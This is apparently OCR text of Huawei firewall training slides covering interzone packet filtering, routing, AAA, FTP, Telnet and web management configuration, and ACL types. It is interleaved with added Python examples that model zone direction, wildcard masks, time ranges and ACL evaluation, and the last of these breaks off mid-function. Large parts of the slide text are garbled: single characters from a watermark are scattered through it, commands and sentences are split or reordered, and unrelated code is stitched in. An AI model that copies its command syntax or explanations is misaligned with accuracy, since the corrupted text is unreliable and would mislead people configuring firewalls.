
Configuration of Default Interzone


m
o
c
.
Packet-Filtering Rules
i
e
w
a
u view.
Step 1 Run the system-view command to enter the system
h
.
g
n | deny } { { all |
Step 2 Run the firewall packet-filter default { permit
i
n| outbound } ] }
r
interzone zone1 zone2 } [ direction { inbound
a
e
l packet filtering rules.
command to configure the interzone default
/
/
:
p
t
ht
Do zones1:or zone 2 follow the sequence?
e
c
r
u
o
s
Re No, because the inbound and outbound
g
n
i
direction are only related to the domain priority.
n
r
a
Le
e
r
o
Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 55
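Added example, not from the training material: a small Python model of why the zone order in an interzone default rule does not matter. The direction (inbound or outbound) is derived from the zone priorities and the zone pair is normalised before lookup, so "interzone trust untrust" and "interzone untrust trust" address the same pair. The priority values (local 100, trust 85, dmz 50, untrust 5) and the deny-everything starting point are assumptions written into the example; the command form in the comments is the one on the slide.

```python
# Added example (not from the Huawei material): the direction of an
# interzone rule follows from security zone priorities, so the zone pair
# given to 'firewall packet-filter default ... interzone zone1 zone2' can
# be written in either order.  Priority values below are assumed.
from typing import Dict, Optional, Tuple

ZONE_PRIORITY: Dict[str, int] = {"local": 100, "trust": 85, "dmz": 50, "untrust": 5}


def direction(src_zone: str, dst_zone: str) -> str:
    """'inbound' when traffic goes from a lower- to a higher-priority zone,
    'outbound' when it goes from higher to lower."""
    ps, pd = ZONE_PRIORITY[src_zone], ZONE_PRIORITY[dst_zone]
    if ps == pd:
        raise ValueError("an interzone rule needs two zones of different priority")
    return "inbound" if ps < pd else "outbound"


def interzone_key(zone1: str, zone2: str) -> Tuple[str, str]:
    """Canonical form of a zone pair: higher-priority zone first."""
    hi, lo = sorted((zone1, zone2), key=lambda z: -ZONE_PRIORITY[z])
    return hi, lo


class DefaultPacketFilter:
    """Model of 'firewall packet-filter default { permit | deny }
    { all | interzone zone1 zone2 } [ direction { inbound | outbound } ]'."""

    def __init__(self) -> None:
        self.all_default = "deny"                       # assumed starting point
        self.rules: Dict[Tuple[Tuple[str, str], str], str] = {}

    def configure(self, action: str, zone1: Optional[str] = None,
                  zone2: Optional[str] = None, direction_: Optional[str] = None) -> None:
        if zone1 is None or zone2 is None:              # the 'all' form
            self.all_default = action
            return
        key = interzone_key(zone1, zone2)
        for d in ([direction_] if direction_ else ["inbound", "outbound"]):
            self.rules[(key, d)] = action

    def lookup(self, src_zone: str, dst_zone: str) -> str:
        """Action applied to the first packet of a flow from src_zone to
        dst_zone when no explicit interzone policy matches."""
        d = direction(src_zone, dst_zone)
        return self.rules.get((interzone_key(src_zone, dst_zone), d), self.all_default)
```

Note that a rule written as "untrust trust outbound" still permits only trust-to-untrust traffic: outbound is defined by the priorities, not by the order of the two names.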

Route Configuration

The following operation is performed when configuring static routing:

Step 1 Run the system-view command to enter the system view.

Step 2 Run the ip route-static ip-address { mask | mask-length } { interface-type interface-number | next-ip-address } [ preference value ] [ reject | blackhole ] command to add a static route.

The following operation is performed when configuring default routing:

Step 1 Run the system-view command to enter the system view.

Step 2 Run the ip route-static ip-address { mask | mask-length } { interface-type interface-number | next-ip-address } [ preference value ] [ reject | blackhole ] command to configure the default route.
AAA Configuration

The configuration method for adding a user to the firewall in the AAA view is as follows:

Step 1 Run the aaa command to enter the AAA view.

Step 2 Run the local-user user-name password { simple | cipher } password command to create the user and set the password.
n
e
/

m
o
c

FTP Configuration

.
i
e

w
a
u

If the firewall is configured as the FTP server, the configuration method is shown as

h
.
g

follows:

n
i
n

Step 1 Run the system-view command to enter the system view and complete the basic

r
a
le

firewall configuration.

/
/
p:

Step 2 Run the ftp server enable command to enable the FTP server.

t
t
h

Step 3 Refer to section "AAA configuration" and create the FTP user.

:
s
e
c
the user access directory.r Only when the username, password, and access
u
o
directory are configured,
s the FTP client can be logged in and files on the firewall
e
R
can be accessed. The system be accessed by multiple users at the same time.
g
n
i
Step 5 Run the local-user
lever number { 1 | 2 | 3 } command to configure the user's
n
r
alevel.
access
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 59
Copyrig
o
Step 4 Run the local-user user-name ftp-directory ftp-directory command to configure

Telnet Configuration

Step 1 Run the system-view command to enter the system view.

Step 2 Run the user-interface [ user-interface-type ] user-interface-number [ ending-user-interface-number ] command to enter the user interface view.

Step 3 Run the idle-timeout minutes [ seconds ] command to allow the Telnet connection to be ended after a fixed idle time. To prevent an illegitimate user from taking over an authorized user's session, if no input is received from the terminal user for a period of time, the connection with the user should be disconnected. By default, the disconnection time of the terminal user is set to 10 minutes.

Note: Refer to section "AAA Configuration" to add the Telnet user.
n
e
/

m
o
c

Telnet Configuration

.
i
e

Telnet authentication modes

w
a
u

h
.
g

n
i
n

No
authentication

Password
Password
authentication

/
/
p:

r AAA
a
leauthentication

authentication

t
t
Step 4 Run the authentication-mode { aaa | none | h
password | local user username password
password } command to set the authentication
mode when logging in to the user interface. By
:
s
default, the password authenticationeis set as the authentication method.
c { simple | cipher } password command to set the
r
Step 5 Run the set authentication password
u When the password authentication is set as the
o
password for the local authentication.
escommand needs to be configured (optional).
authentication method, R
this
Step 6 Run the user privilege
g level level command to configure the command level that can be
n
accessed by the user
i from the current user interface login system. The default level is 0
n
r the authentication-mode is set as the aaa mode, this step does not need to
(optional). (When
a
be configured.)
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 62
Copyrig
o
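Added example, not from the training material: a Python check over a Telnet user-interface configuration written in the command forms the slides above show. It reports the settings a reviewer would question: authentication-mode none, a cleartext (simple) password kept in the configuration, management level 3 reachable on an interface with no authentication, and an idle timeout of 0 0. The configuration excerpt is constructed, and the reading of idle-timeout 0 0 as "never disconnect" is this example's assumption.

```python
# Added example (not from the Huawei material): audit the Telnet
# user-interface settings from the slides.  SAMPLE_CONFIG is constructed.
import re
from typing import List

SAMPLE_CONFIG = """\
user-interface vty 0 4
 authentication-mode none
 user privilege level 3
 idle-timeout 0 0
user-interface vty 5 9
 authentication-mode password
 set authentication password simple huawei
 user privilege level 0
 idle-timeout 10 0
user-interface vty 10 14
 authentication-mode aaa
 idle-timeout 5 0
"""


def audit_user_interfaces(config: str) -> List[str]:
    """Return one finding per weak setting, prefixed with the user-interface
    block it was found in.  Lines outside a user-interface block are ignored."""
    findings: List[str] = []
    block, auth = None, None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("user-interface "):
            block, auth = line, None            # new block: forget the previous auth mode
            continue
        if block is None:
            continue
        m = re.match(r"authentication-mode (\S+)", line)
        if m:
            auth = m.group(1)
            if auth == "none":
                findings.append(f"{block}: authentication-mode none (no login authentication)")
            continue
        if line.startswith("set authentication password simple "):
            findings.append(f"{block}: cleartext (simple) password stored in the configuration")
        elif line == "user privilege level 3" and auth == "none":
            findings.append(f"{block}: management level 3 granted without authentication")
        else:
            m = re.match(r"idle-timeout (\d+)(?: (\d+))?$", line)
            # Assumption for this example: 'idle-timeout 0 0' disables the timeout.
            if m and int(m.group(1)) == 0 and int(m.group(2) or 0) == 0:
                findings.append(f"{block}: idle-timeout 0 0 never disconnects idle sessions")
    return findings
```

The check relies on the command order the slides prescribe (authentication-mode before user privilege level), which is also the order the device writes them in.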

Web Management Configuration

Step 1 Run the system-view command to enter the system view.

Step 2 Run the web-manager [ security ] enable [ port port-number ] command to enable the Web management function.

Step 3 Refer to section "AAA Configuration" to add the Web management user.

Step 4 Run the local-user user-name service-type web command to configure the user's service type as Web.

Step 5 Run the local-user user-name level 3 command to configure the user's level. The Web user's level must be set to level 3 (highest level).
n
e
/

m
o
c

Other Basic Configurations

.
i
e

w
a
u

Users can modify the current firewall configuration by using the command
line interface. To set this current configuration as the initial configuration of
the firewall for the next time when powering on, run the save command to
save this current configuration into the default storage device and form the
configuration file.

h
.
g

n
i
n

r
a
le

/
/
p:

In the user's view, run the reset saved-configuration command to erase the
configuration file. After the configuration file is erased, the firewall will
adopt the default configuration parameters to initiate for the next time
when powering on.

t
t
h

:
s
e
c
In the user's view, run the r
reboot command. The firewall is restarted and
u
o
this restart action is logged.
s
e
R
Run the startup system-software sysfile command to configure the system
g for the next startup.
n
software file name
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 64
Copyrig
o

n
e
/

m
o
c

Summary

Definition and classification of firewalls

.
i
e

w
a
u

h
.
g

n
i
Main features and technologies of firewalls
n

r
a
efirewall configurations
Data forwarding process and basic
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 65
Copyrig
o

n
e
/

m
o
c

Questions

w
a
u

What is the difference between the stateful inspection firewall and the
packet-filtering firewall?

.
i
e

h
.
g

n
i
Why the V100R005 has no firewall working modenconfiguration? What
r
a
e
mode does it use to differentiate?
l
/
/
What is the relationship between the security
: zone and the interface?
p
t
t
What is the difference between Inbound
h and Outbound in the interzone
:
packet filtering policies?
s
e
c
r IP link is integrated with the static routing and
After the reliable technology
u
o
s
dual-system hot backup
technology, what are the advantages?
e
R
g
n
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 66
Copyrig
o

n
e
/

m
o
c

Answer

.
i
e

w
a
u

h
.
g

n
i
n

r
a
le

/
/
p:

:
s
e
c
r

t
t
h

u
o
s

n
r
a

e
r
o

g
n
i

Re

Le

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 67

n
e
/

m
o
c

.
i
e

w
a
u

h
.
g

n
i
n

r
a
le

Thank :you
//
p
www.huawei.com
t
t

:
s
e
c
r

u
o
s

n
r
a

e
r
o

Le

g
n
i

Re

n
e
/

m
o
c

.
i
e

Chapter 3
Filtering

n
r
a

g
n
i

w
a
u

h
.
g
Firewall Packet
n
i
n
r
a
Technologyle
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re

e
L
Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
e
r
o

www.huawei.com

Objectives

Upon completion of this course, you will be able to:

ACL principles

ACL functions and classification

Application scenarios and configurations of interface-based packet filtering

Application scenarios and configurations of interzone packet filtering
n
e
/

m
o
c

Contents

.
i
e

w
a
u

1. ACL Overview
2. Interface-based Packet Filtering

h
.
g

3. Interzone Packet Filtering

n
i
n

r
a
le

/
/
p:

4. Application Analysis of Packet


tt Filtering

:
s
e
c
r

u
o
s

n
r
a

e
r
o

g
n
i

Re

Le

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 2

n
e
/
m
o
c
Overview of IP Packet Filtering Technology
.
i
e
w
For the packets to be forwarded, the firewall reads/examines the packet
a header and
u
h whether to
compare the header information against the defined rules to determine
.
gor discard the packet
n
permit the packets or not. The firewall determines to forward
i
n
based on the comparison. The key packet filtering technology
r is ACL.
a
e
l
/
/
:
p
t
Intranet
t
h
:
s
e
c
r
Internet
u
o
s
Regional office
Re
g
n
i
n
r
a
H.Q.Le
Unauthorized user
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 3
Copyrig
o

ACL Definition

The TCP/IP packet format is as shown in the following figure. In this figure, the upper-layer protocol is TCP/UDP.

(Figure: MAC packet header | IP packet header | TCP/UDP packet header | Data. The IP packet header carries the protocol number, source address and destination address; the TCP/UDP packet header carries the source port and destination port.)

For TCP/UDP packets, these five elements constitute a quintuple, and the ACL is defined according to this information.
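Added example, not from the training material: extracting the quintuple the slide refers to (protocol number, source and destination address, source and destination port) from a raw Ethernet frame in Python. The frame builder is a constructed test input (Ethernet II, IPv4 and minimal TCP/UDP headers, no checksums); the offsets used by quintuple() are those of the standard headers, and non-IPv4 or truncated frames return None rather than a partial tuple.

```python
# Added example (not from the Huawei material): parse the five ACL match
# fields out of a frame.  build_frame() only produces constructed test input.
import struct
from typing import Dict, Optional

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP, PROTO_UDP = 6, 17


def inet(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def build_frame(src_ip: str, dst_ip: str, proto: int, sport: int, dport: int) -> bytes:
    """Minimal Ethernet/IPv4 frame with a TCP header (proto 6) or an 8-byte
    UDP-style header (anything else).  Checksums are left at zero."""
    eth = bytes.fromhex("aaaaaaaaaaaa") + bytes.fromhex("bbbbbbbbbbbb") + struct.pack("!H", ETHERTYPE_IPV4)
    l4_len = 20 if proto == PROTO_TCP else 8
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + l4_len, 0, 0, 64, proto, 0,
                     inet(src_ip), inet(dst_ip))
    if proto == PROTO_TCP:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 0, 0, 0)
    else:
        l4 = struct.pack("!HHHH", sport, dport, l4_len, 0)
    return eth + ip + l4


def quintuple(frame: bytes) -> Optional[Dict]:
    """Return {proto, src, dst, sport, dport}; ports are None for non-TCP/UDP
    packets, and the result is None for non-IPv4 or truncated frames."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ihl = (frame[14] & 0x0F) * 4            # IPv4 header length in bytes
    proto = frame[23]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    if proto not in (PROTO_TCP, PROTO_UDP):
        return {"proto": proto, "src": src, "dst": dst, "sport": None, "dport": None}
    l4 = 14 + ihl
    if len(frame) < l4 + 4:                  # ports not present: do not guess
        return None
    sport, dport = struct.unpack("!HH", frame[l4:l4 + 4])
    return {"proto": proto, "src": src, "dst": dst, "sport": sport, "dport": dport}
```

A filter that has to match on ports must also decide what to do when the ports are absent (non-initial fragments, truncated frames); here that case is made explicit instead of defaulting to port 0.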

n
e
/

m
o
c

ACL Principles

.
i
e

w
a
u

ACL
Allows A to carry out
subsequent operations
Denies subsequent
operations of B

Step 1:
The inbound data flow
arrives on the firewall.
Inbound
data flow

ACL functions:

n
r
a

g
n
i

h
.
Step 2: g
n
i
Search
n for the ACL.
r
aDetermine whether to
e
l

/ allow the next operation.


/
:
Default policy operation
Step 3:
p
t
The firewall processes
ht
packets according to the
: AAAA
AA
s
ACL.
BBAABBBAAAA
e
c
r
u
o
Outbound
s
e
data flow
R

Filter flows that pass through the firewall based on the defined rules. The
keyword determines the next step for the filtered out flows.

e
r
o

Le

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 5

n
e
/

m
o
Packet Filtering Classificationi.c
e
w
a
u
Interface packet filtering
h
.
g
Outbound
n
i
n
r
Inbound
a
e
l
G0/0/0
G0/0/1 //
:
p
t
t
h
Interzone packet filtering :
s
Outbound
e
c
r
u
o
s
Trust zone
Untrust zone
e
R
g
n
i
n
r
a
Inbound
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 6
Copyrig
o

n
e
/

m
o
c

Contents

.
i
e

w
a
u

1. ACL Overview
2. Interface-based Packet Filtering

h
.
g

3. Interzone Packet Filtering

n
i
n

r
a
le

/
/
p:

4. Application Analysis of Packet


tt Filtering

:
s
e
c
r

u
o
s

n
r
a

e
r
o

g
n
i

Re

Le

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 7

n
e
/

m
Overview of Interface-based Packet
o
c
.
Filtering
i
e
w
a
u
h
Application
.
Filtered Object
PacketngFiltering Mode
Interface
i
n
r
a
e
IP packet
Interface-based
packet filtering
l
/
/
:MAC address-based packet
Common interface
p
Ethernet framett
h filtering
:
s
e and
Interface on special IP packet
c
r
Hardware packet filtering
u
o frame
interface card
Ethernet
s
Re
Scenario: Interfaces
g
n
has not been added
i
n
to a security zone.
r
a
Le
e
r
o
Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 8

n
e
/

m
o
c

ACL Classification

.
i
e

w
a
u

Identify ACLs by using numbers.

Identify ACL types by using number ranges.


in

n
r
a
e
l

/
/
p: Number Range

ACL Type
Basic ACL
Advanced ACL

s:

t
t
h

e
c
r

u
o
s

MAC-based ACL
Re

e
r
o

h
.
g

g
n
Hardware
i packet filtering ACL
n
r
a
Le

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

2000-2999
3000-3999
4000-4999
9000-9499

Pa ge 9

Basic ACL

The basic ACL uses only source addresses to describe data, indicating whether to perform the next operation.

(Figure: packets from IP address 202.110.10.0/24 can pass through the firewall; packets from IP address 192.110.10.0/24 cannot pass through the firewall.)
n
e
/

m
o
c

Basic ACL Configuration

.
i
e

w
a
u

Access the system view:

h
.
g

acl [ number ] acl-number [ vpn-instance vpn-instance-name ]

Create a basic ACL and enter the ACL view:

n
i
n

r
a
rule [ rule-id ] { permit | deny } [ source { source-address
source-wildcard |
e
l
/
any |address-set address-set-name } | time-range
time-name | logging ]
/
:
p
Apply the basic ACL and enter the tinterface
view:
t
h
firewall packet-filter acl-number {inbound | outbound}
:
s
e
c
r
How do you use an IP
u
o
s
address and a
e
R
wildcard mask to indicate
g
a network segment?
n
i
n
r
a
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 11
Copyrig
o

How to Use the Wildcard Mask

The wildcard mask format is similar to the subnet mask format, but they have different meanings.

0: indicates that the corresponding bit in the IP address should be compared.

1: indicates that the corresponding bit in the IP address will not be compared.

The wildcard mask is used together with the IP address to describe an address range.

Wildcard Mask | Meaning
0.0.0.255 | Compares the first 24 bits only
0.0.3.255 | Compares the first 22 bits only
0.255.255.255 | Compares the first 8 bits only

What is the function of wildcard mask 0.255.0.255?
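Added example, not from the training material, covering the Basic ACL slide and the wildcard mask table above: a Python implementation of the wildcard compare (0 bits compared, 1 bits ignored) and a helper that reports which bits a mask compares. It reproduces the three table rows and answers the 0.255.0.255 question: the ignored bits need not be contiguous, so that mask compares the first and third octets only. The addresses used are the ones on the slides.

```python
# Added example (not from the Huawei material): wildcard-mask matching.
from typing import List


def ip_to_int(ip: str) -> int:
    a, b, c, d = (int(o) for o in ip.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def wildcard_match(ip: str, base: str, wildcard: str) -> bool:
    """True when every bit the wildcard marks 0 is equal in ip and base."""
    keep = ~ip_to_int(wildcard) & 0xFFFFFFFF          # 1 = compared bit
    return ip_to_int(ip) & keep == ip_to_int(base) & keep


def compared_bits(wildcard: str) -> List[int]:
    """Bit positions (0 = most significant) that the wildcard compares."""
    w = ip_to_int(wildcard)
    return [i for i in range(32) if not (w >> (31 - i)) & 1]


def describe(wildcard: str) -> str:
    """Wording of the slide's table, extended to non-contiguous masks."""
    bits = compared_bits(wildcard)
    if bits == list(range(len(bits))):               # a prefix, like a subnet mask
        return f"compares the first {len(bits)} bits only"
    runs, start = [], bits[0]
    for prev, cur in zip(bits, bits[1:] + [None]):
        if cur != prev + 1:
            runs.append(f"{start}-{prev}")
            start = cur
    return "compares bits " + ", ".join(runs) + " (non-contiguous)"
```

Because a wildcard can leave a middle octet unchecked, "source 192.168.168.0 0.255.0.255" (a form that appears later in this chapter) matches any address of the shape 192.x.168.y, which is worth keeping in mind when reviewing a rule base.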

Time Range-Based ACL

time-range work-policy1 08:00 to 18:00 working-day
time-range work-policy2 from 08:00 2009/01/01 to 18:00 2009/12/31

rule permit ip source 192.168.11.0 0.0.0.255 time-range work-policy1
rule permit ip source 192.168.12.0 0.0.0.255 time-range work-policy2

(Figure: Trust zone with 192.168.11.0/24 and 192.168.12.0/24, DMZ with the server group 172.16.0.0/16, and the Untrust zone, connected through the firewall; the firewall clock reads 2009/07/15 14:15.)
n
e
/

m
o
Meanings of Time Range Operators .c
i
e
w
a
u
h
.
Meanings
Operator and Syntax
g
n
i
n
Fromr xx time To xx time
HH:MM
a
e
l
/
/ From xx date To xx date
YYYY/MM/DD
:
p
t
tMonday/Tuesday/Wednesday/Thursda
h
Mon/Tue/Wed/Thu/Fri/Sat/Sun :
y/Friday/Saturday/Sunday
s
e
c
r
u
Daily
Every day in a week
o
s
e
R
Off days
Off days (Saturday/Sunday)
g
n
i days
Working
Working days (Monday to Friday)
n
r
a
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 14
Copyrig
o
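Added example, not from the training material: evaluating the two time-range forms of the previous slides in Python, a periodic range (HH:MM to HH:MM with a day selector) and an absolute range (from date/time to date/time), against a given moment. The range definitions, rule sources and the 2009/07/15 14:15 clock reading are the slide's; the matching logic, the rule representation and the additional test moments are this example's own.

```python
# Added example (not from the Huawei material): time-range evaluation.
from datetime import datetime, time
from typing import Callable, Dict, List

DAY_NAMES = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]   # datetime.weekday() order
DAY_SELECTORS: Dict[str, Callable[[int], bool]] = {
    "daily": lambda wd: True,
    "working-day": lambda wd: wd < 5,
    "off-day": lambda wd: wd >= 5,
}


def periodic(start: str, end: str, days: str) -> Callable[[datetime], bool]:
    """'time-range name HH:MM to HH:MM { daily | working-day | off-day | Mon Tue ... }'."""
    t0, t1 = time.fromisoformat(start), time.fromisoformat(end)
    if days in DAY_SELECTORS:
        day_ok = DAY_SELECTORS[days]
    else:
        wanted = {DAY_NAMES.index(d.lower()[:3]) for d in days.split()}
        day_ok = lambda wd: wd in wanted
    return lambda now: day_ok(now.weekday()) and t0 <= now.time() <= t1


def absolute(start: str, end: str) -> Callable[[datetime], bool]:
    """'time-range name from HH:MM YYYY/MM/DD to HH:MM YYYY/MM/DD'."""
    fmt = "%H:%M %Y/%m/%d"
    t0, t1 = datetime.strptime(start, fmt), datetime.strptime(end, fmt)
    return lambda now: t0 <= now <= t1


TIME_RANGES: Dict[str, Callable[[datetime], bool]] = {
    "work-policy1": periodic("08:00", "18:00", "working-day"),
    "work-policy2": absolute("08:00 2009/01/01", "18:00 2009/12/31"),
}

# The two permit rules of the slide, each bound to a time range by name.
RULES: List[Dict[str, str]] = [
    {"action": "permit", "source": "192.168.11.0/24", "time-range": "work-policy1"},
    {"action": "permit", "source": "192.168.12.0/24", "time-range": "work-policy2"},
]


def active_rules(now: datetime) -> List[str]:
    """Source segments whose rule is in effect at 'now'; a rule whose time
    range is not active behaves as if it were absent from the ACL."""
    return [r["source"] for r in RULES if TIME_RANGES[r["time-range"]](now)]
```

The absolute range is a single window from its start instant to its end instant, so work-policy2 is also active at night and at weekends inside 2009; only the periodic form restricts by weekday.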

Advanced ACL

The advanced ACL uses more information besides the source address to define a packet, indicating whether to carry out the next step.

(Figure: packets from IP address 202.110.10.0/24 to IP address 179.100.17.10 that use TCP and access resources by using HTTP can pass through the firewall.)

Which information is detected by the firewall based on status detection?
n
e
/

m
o
c
Advanced ACL Configuration Commands
.
i
e
w
In system view:
a
u
h
acl [ number ] acl-number [ vpn-instance vpn-instance-name.]
g
n
i
n
Create an advanced ACL and enter the ACL view:
r
a
e { destination-address
rule [ rule-id ] { deny | permit } protocol [ destination
l
/
/
destination-wildcard | any | address-set address-set-name
} | destination-port {
:
p
t } | precedence precedence | source
operator port1 [ port2 ] | port-set port-set-name
t
h
{ source-address source-wildcard |:any | address-set address-set-name } | sources
e
port { operator port1 [ port2 ] |cport-set port-set-name } | time-range time-name | tos
r
u
o icmp-code | logging ]
tos | icmp-type icmp-type
s
e
R
Apply the advanced ACL and enter the interface view:
g
n
i
firewall packet-filter
acl-number {inbound | outbound}
n
r
a
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 16
Copyrig
o

Meanings of Port Number Operators in the Advanced ACL

Operator and Syntax | Meaning
equal portnumber | Equal to port number
greater-than portnumber | Greater than port number
less-than portnumber | Smaller than port number
not-equal portnumber | Not equal to port number
range portnumber1 portnumber2 | Between port number1 and port number2
n
e
/

Functions of Address Set and Service


m
o
c
.
i
Set
e
w
.

a
u
h

ServicengSet

Address Set

i
n
r

ip address-set guest type object


address 0 192.168.12.0 0.0.0.15
address 1 192.168.15.0 0.0.0.63
address 2 192.168.30.0 0.0.0.127

Re

/
/
:
servicep protocol tcp destination-port 8080
t
t
service
h protocol tcp destination-port 8443
service protocol tcp destination-port 80

: service protocol udp destination-port 53


s
e
c
r

u
o
s

ip address-set ERP type object

a
e
l

ip service-set Internet type object

address 0 10.10.0.0 0.0.0.127

ip service-set ERP type object

service protocol tcp destination-port 21

service protocol tcp destination-port 80


g
n
i 0.0.0.255
address 2 10.100.10.0
service protocol tcp destination-port 1521
n
r
service protocol tcp destination-port 8443
a
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 19
Copyrig
o
address 1 10.16.15.0 0.0.0.255

Advanced ACL Examples

rule deny ip source address-set guest destination address-set erp
rule permit tcp source address-set guest destination any destination-port service-set Internet

(Figure: IP packets from 10.1.0.0/16.)

rule deny tcp source 129.9.0.0 0.0.255.255 destination 202.38.160.0 0.0.0.255 destination-port equal www

(Figure: TCP packets from 129.9.0.0/16 to the WWW port of 202.38.160.0/24 are denied.)
MAC Address-Based ACL

n
e
/

.
i
e

m
o
c

w
a
MAC address-based ACL defines data flows according to
u the source
h
. in the
g
MAC address, destination MAC address, and type fields
n
i
n
Ethernet frame head to control Layer-2 data frames.
r
a
e
l
/
Packets to DMAC
/ B-B-B
:
p
can pass through
the
t
firewall!
ht
:
s
e
c
Packets from SMAC A-A- ur
o
A cannot pass through
s
the firewall! Re
Firewall
g
n
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 21
Copyrig
o

n
e
/

m
o
c

MAC Address-Based ACL Configuration .


i
e
w
Access the system view:
a
u
h
. ]
acl [ number ] acl-number [ vpn-instance vpn-instance-name
g
n
i
n the ACL view:
r
Create an MAC address-based ACL and enter
a
e
l| type-name} | cos lcos-code |cosrule [ rule-id ] { permit | deny } { type {type-code
/
/
:
name}} [ source-mac source-address source-mac-wildcard
] [ dest-mac destinationp
t
address destination-mac-wildcard ] ht
:
s
Apply the MAC address-based
ACL and enter the interface
e
c
r
u
view:
o
s
Re
firewall ethernet-frame-filter
acl-number inbound
g
n
i
n
r
a
Le
e
r
o

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 22

Hardware Packet Filtering ACL

It filters packets in hardware. Traffic can be matched based on the source MAC address, destination MAC address, source IP address, destination IP address and protocol.

(Figure: an interface that supports hardware packet filtering matches on the source MAC address, destination MAC address, source IP address, destination IP address, IP protocol, source port and destination port.)
n
e
/

m
o
c

Hardware ACLs Configuration

Access the system view:

w
a
u

h
.
g

acl [ number ] acl-number [ vpn-instance vpn-instance-name ]

in
Create a hardware ACL and enter the ACLnview:

r
a
rule [ rule-id ] { permit | deny } { source-mac source-mac-address
source-mace
l
/ destination-mac-wildcard
wildcard | destination-mac destination-mac-address
/
:
p
|source-ip source-ip-address source-wildcard
t | destination-ip destination-ip-address
t
h
destination-wildcard | protocol { icmp [ icmp-type { icmp-type icmp-code | icmp:
s
message } ] | { tcp | udp } [ source-port
e { port | protocol-name } ] [ destination-port
c
r
{ port | protocol-name ] | ipu| igmp | gre | ospf | ipinip } | ethernet-type { type-code |
o
s
e
type-name } | cos {Rcos-code
| cos-name } }
g
Apply the hardware
ACL and enter the interface view:
n
i
n acl-number inbound
r
hardware-filter
a
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 24
Copyrig
o

Matching Mode and Step Configuration

Access the system view and create the ACL with a matching order:
acl [ number ] acl-number [ vpn-instance vpn-instance-name ] [ match-order { auto | config } ]

Set the ACL step:
step step
n
e
/

m
o
c
Acceleration and Counter Functions
.
i
e
w
a
ACL acceleration function
u
h
.
g
It enhances the ACL search performance significantly.
n
i
n
r
ACL counter
a
e
l
acl 2001
/
ACL counter
/ 10.32.255.0 0.0.0.255
:
rule 0 permit source
p
t
rule 10 permit
ht source 192.168.10.0 0.0.0.255
:
s
e
c
r
u
o
display acl 2001
s
17:18:07 2009/07/21 e
R
Basic ACL 2001, 2 rules, not binding with vpn-instance
Acl's step is 5 ng
i 10.32.255.0 0.0.0.255 (27 times matched)
rule 0 permitnsource
r source 192.168.10.0 0.0.0.255 (1 times matched)
rule 10 permit
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 26
Copyrig
o
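Added example, not from the training material, serving the port-operator table and the advanced ACL configuration commands as well as the step and counter slides just above: a Python advanced-ACL evaluator. It implements the five port operators, step-based rule numbering, first-match evaluation in rule-id order (the config match order) and the per-rule match counter that display acl prints. The traffic samples are constructed, the numbering rule for automatically assigned ids is an assumption, and the display() text only approximates the device output on the slide.

```python
# Added example (not from the Huawei material): advanced ACL evaluation with
# port operators, step numbering and match counters.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


def ip_int(ip: str) -> int:
    return int.from_bytes(bytes(int(o) for o in ip.split(".")), "big")


def addr_match(ip: str, base: str, wildcard: str) -> bool:
    """Wildcard compare: bits set to 1 in the wildcard are ignored."""
    keep = ~ip_int(wildcard) & 0xFFFFFFFF
    return ip_int(ip) & keep == ip_int(base) & keep


PORT_OPERATORS = {
    "equal":        lambda p, a, b=None: p == a,
    "greater-than": lambda p, a, b=None: p > a,
    "less-than":    lambda p, a, b=None: p < a,
    "not-equal":    lambda p, a, b=None: p != a,
    "range":        lambda p, a, b: a <= p <= b,
}

ANY = ("0.0.0.0", "255.255.255.255")


@dataclass
class Rule:
    rule_id: int
    action: str                                  # "permit" | "deny"
    protocol: str                                # "ip" | "tcp" | "udp"
    source: Tuple[str, str] = ANY                # (address, wildcard)
    destination: Tuple[str, str] = ANY
    destination_port: Optional[Tuple] = None     # (operator, port1[, port2])
    matched: int = 0                             #  the ACL counter

    def matches(self, pkt: Dict) -> bool:
        if self.protocol != "ip" and pkt["proto"] != self.protocol:
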